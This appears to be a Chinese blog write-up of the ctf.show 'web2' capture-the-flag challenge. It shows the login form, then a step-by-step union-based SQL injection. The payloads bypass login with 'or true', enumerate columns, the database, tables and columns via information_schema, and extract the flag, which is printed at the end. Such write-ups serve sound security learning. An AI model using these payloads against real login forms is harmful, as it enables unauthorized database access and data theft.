ctf.show_web2-爱代码爱编程
题目:
<html lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
<title>ctf.show_web2</title>
</head>
<body>
<center>
<h2>ctf.show_web2</h2>
<hr>
<form method="post">
用户名:<input type="text" name="username"><br><br>
密 码:<input type="password" name="password"><br><br>
<input type="submit" value="登陆">
</form>
</center>
</body>
</html>
解题思路:
题目是登陆框,猜测是SQL注入。先对万能密码尝试
password=1&username=1' or true #
![image.png](https://img-blog.csdnimg.cn/img_convert/961171a0a4ead9652e3530259af2aee0.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u6770cdf5&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=86480&status=done&style=none&taskId=u56a08447-d029-4923-ba8b-1954db4bd80&title=&width=1536)
果然存在SQL注入,但是没有flag回显。可能考点并非万能登陆,而是flag存放在数据库里。接下来爆一下ctfshow的占位符是几
password=1&username=1' union select 1,2,3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/ed694841fc883983c27f437e58c1e39a.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u12714eba&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95716&status=done&style=none&taskId=uad8d60f3-e8af-4bcb-b464-42b32718285&title=&width=1536)
已知占位符是2,开始爆数据库库名
password=1&username=1' union select 1,database(),3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/92d62a8a6b94795df2b2b22a83966de9.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1caacf13&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=98153&status=done&style=none&taskId=u4a5b2657-60ba-40db-adcc-a7e1e711057&title=&width=1536)
已知数据库库名为web2,继续爆数据库表
password=1&username=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/53cdd1a0c1592749d445433f06773836.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1204504f&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=105918&status=done&style=none&taskId=u823803b9-9fc4-4660-b922-e6e7b7a92ec&title=&width=1536)
当前已知表名是flag和user这两个表,很有可能flag在flag表中或者flag在flag表的字段里。继续爆字段
以下两种payload均可
password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag' #
password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() #
![image.png](https://img-blog.csdnimg.cn/img_convert/dbc88ee2e05d2acc04c50a08386a358c.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=uf2152f2a&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=102001&status=done&style=none&taskId=u18486a51-ecfa-4d1c-b3da-163a9ee5ffc&title=&width=1536)
之前一直没找到flag,flag也许就藏在表内容里了。最后爆出flag表中的内容
以下两种payload均可
password=2&username=1' union select 1,(select * from flag),3 #
password=2&username=1' union select 1,(select flag from flag),3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/89721a792d68ffb83f85d00186edfe15.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u4324edfa&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=94195&status=done&style=none&taskId=u0ba82ce0-ffd6-481f-be07-9ca3815a7d2&title=&width=1536)
获得题目flag为:ctfshow{1aefca01-afd4-4527-a35b-c5a8be893ae0}